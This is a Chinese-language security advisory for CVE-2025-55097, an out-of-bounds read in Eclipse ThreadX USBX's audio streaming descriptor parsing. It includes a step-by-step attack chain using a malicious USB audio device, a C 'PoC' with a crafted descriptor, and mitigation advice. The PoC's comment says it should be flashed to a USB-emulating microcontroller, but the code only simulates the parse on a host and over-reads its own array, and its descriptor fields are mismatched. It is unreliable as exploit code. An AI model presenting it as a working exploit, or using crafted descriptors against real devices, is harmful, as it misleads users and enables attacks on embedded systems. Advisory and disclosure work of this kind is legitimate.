CVE-2025-55097 USBX音频流采样解析越界读取漏洞

漏洞信息

漏洞编号

CVE-2025-55097

漏洞类型

越界读取（Out-of-Bounds Read）

CVSS评分

6.1 中危

攻击向量

物理 (AV:P)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Eclipse ThreadX USBX

漏洞概述

CVE-2025-55097是Eclipse基金会ThreadX操作系统中USBX模块存在的一个安全漏洞。USBX是ThreadX的USB主机/设备/OTG支持模块，广泛应用于嵌入式系统和物联网设备中。该漏洞存在于USBX 6.4.3之前的版本中，具体位于`_ux_host_class_audio_streaming_sampling_get()`函数中。当系统解析USB音频流设备（USB Audio Streaming Device）的描述符时，由于缺乏对输入数据有效性的充分校验，可能导致越界读取（Out-of-Bounds Read）操作。

根据CVSS 3.1评分体系，该漏洞评分为6.1分，属于中等严重级别。其攻击向量为物理访问（AV:P），攻击者需要物理接触目标设备并插入恶意的USB音频流设备来触发该漏洞。漏洞利用无需任何认证（PR:N）和用户交互（UI:N），一旦触发将导致高机密性影响（C:H）和高可用性影响（A:H），但不影响数据完整性（I:N）。

该漏洞由Eclipse基金会安全团队成员发现并报告。鉴于USBX在嵌入式设备中的广泛应用，包括工业控制、医疗设备、消费电子等领域，该漏洞可能影响大量IoT和嵌入式产品。攻击者可以利用该漏洞读取设备内存中的敏感信息，或导致设备崩溃/拒绝服务，对设备安全构成潜在威胁。

技术细节

该漏洞的根本原因在于`_ux_host_class_audio_streaming_sampling_get()`函数在解析USB音频流设备描述符时，未对描述符中的关键字段（如采样频率、通道数等参数）进行充分的边界检查。当恶意USB设备返回精心构造的音频流描述符时，其中的字段值可能超出函数内部缓冲区或数据结构的预期范围，导致越界内存读取操作。

具体技术细节如下：
1. **漏洞触发点**：`_ux_host_class_audio_streaming_sampling_get()`函数负责从USB音频流接口描述符中提取采样参数信息；
2. **触发条件**：当USB主机枚举到一个音频类（Audio Class）设备并尝试获取其流接口的采样参数时触发；
3. **根本原因**：函数在访问描述符数据时，未验证关键偏移量和长度字段是否在描述符的实际范围内；
4. **攻击方式**：攻击者制作一个恶意的USB音频设备，插入目标设备后，系统自动枚举并解析该设备时触发越界读取；
5. **影响后果**：可能泄露相邻内存中的敏感数据，或因读取非法地址导致系统崩溃（拒绝服务）。

利用该漏洞需要物理访问目标设备的能力（物理攻击向量），这在一定程度上限制了其远程利用的可能性，但在公共充电站、共享设备等场景中仍具有现实威胁。

攻击链分析

STEP 1

步骤1：准备恶意USB设备

攻击者使用微控制器（如基于VUSB或FUSB302的设备）制作一个模拟USB音频类（Audio Class）设备的硬件，该设备返回经过精心构造的畸形音频流接口描述符，其中采样频率类型（bSamFreqType）字段被设置为异常大的值（如255），但描述符长度（bLength）不足以容纳对应数量的采样频率数据。

STEP 2

步骤2：物理接触目标设备

攻击者通过物理方式将恶意USB设备插入或连接到运行受影响USBX版本的目标嵌入式设备上，例如利用公共充电站、共享设备端口、或直接物理访问目标系统。

STEP 3

步骤3：触发USB枚举与描述符解析

目标设备的USBX主机栈自动检测到新连接的USB设备，开始枚举过程。当系统识别到该设备为音频类设备时，调用_ux_host_class_audio_streaming_sampling_get()函数解析音频流接口描述符。

STEP 4

步骤4：触发越界读取

由于畸形描述符中bSamFreqType字段值远大于描述符实际包含的采样频率条目数，函数在迭代读取采样频率数据时发生越界内存访问，读取到描述符边界之外的内存数据。

STEP 5

步骤5：信息泄露或拒绝服务

越界读取的结果可能导致敏感内存数据泄露（如密钥、密码等），或因访问非法内存地址导致系统异常崩溃（内核panic/assertion failure），实现拒绝服务攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * CVE-2025-55097 PoC - USBX Audio Streaming Sampling Get OOB Read
 *
 * This PoC demonstrates the vulnerability by crafting a malicious USB
 * audio streaming descriptor that triggers an out-of-bounds read in
 * _ux_host_class_audio_streaming_sampling_get().
 *
 * To use: Flash this to a microcontroller (e.g., based on FUSB302 or
 * VUSB) that emulates a USB Audio Class device with a malformed descriptor.
 */

#include <stdio.h>
#include <string.h>
#include <stdint.h>

/* USB Audio Streaming Interface Descriptor - Malformed */
typedef struct {
    uint8_t  bLength;
    uint8_t  bDescriptorType;
    uint8_t  bDescriptorSubtype;
    uint8_t  bFormatType;
    uint8_t  bNrChannels;
    uint8_t  bSubframeSize;
    uint8_t  bBitResolution;
    /* Intentionally malformed sampling frequency fields to trigger OOB read */
    uint8_t  bSamFreqType;        // Set to abnormally high value
    uint8_t  tSamFreq[1];         // Truncated frequency data (normally 3 bytes per freq)
} __attribute__((packed)) malformed_audio_streaming_if_desc_t;

/* Crafted malicious descriptor payload */
uint8_t malicious_descriptor[] = {
    0x07,                   // bLength = 7 (too short for declared content)
    0x24,                   // bDescriptorType = CS_INTERFACE (0x24)
    0x01,                   // bDescriptorSubtype = AS_GENERAL (0x01)
    0x01,                   // bFormatType = PCM
    0x02,                   // bNrChannels = 2
    0x02,                   // bSubframeSize = 2
    0x10,                   // bBitResolution = 16
    /* The following would normally be part of a Type I format descriptor */
    0xFF,                   // bSamFreqType = 255 (causes OOB iteration)
    0xFF, 0xFF, 0xFF        // Insufficient frequency data for 255 entries
};

int main(void) {
    /* Simulate the vulnerable parsing logic */
    malformed_audio_streaming_if_desc_t *desc =
        (malformed_audio_streaming_if_desc_t *)malicious_descriptor;

    printf("[*] CVE-2025-55097 PoC - USBX OOB Read\n");
    printf("[*] bSamFreqType: %u\n", desc->bSamFreqType);
    printf("[*] Descriptor length: %u (insufficient for declared freq count)\n",
           desc->bLength);

    /* The vulnerable code would iterate bSamFreqType times over tSamFreq,
     * reading beyond the descriptor boundary - this is the OOB read */
    for (int i = 0; i < desc->bSamFreqType; i++) {
        /* This read goes out of bounds when i >= actual array size */
        printf("[*] SamFreq[%d]: 0x%02x\n", i, desc->tSamFreq[i * 3]);
    }

    return 0;
}

影响范围

Eclipse ThreadX USBX < 6.4.3

防御指南

临时缓解措施

在无法立即升级到USBX 6.4.3版本的情况下，建议采取以下临时缓解措施：1）限制目标设备的物理访问权限，防止未经授权的USB设备接入；2）在系统层面实施USB设备过滤，仅允许已知供应商ID（VID）和产品ID（PID）的设备连接；3）在USBX配置中禁用USB主机音频类（Audio Class）支持，如果业务场景允许的话；4）启用USB端口的物理锁定机制（如端口禁用、盖板封锁等）；5）加强系统监控，检测异常的USB设备枚举和描述符解析行为；6）关注Eclipse基金会发布的安全补丁，在条件允许时尽快完成版本升级。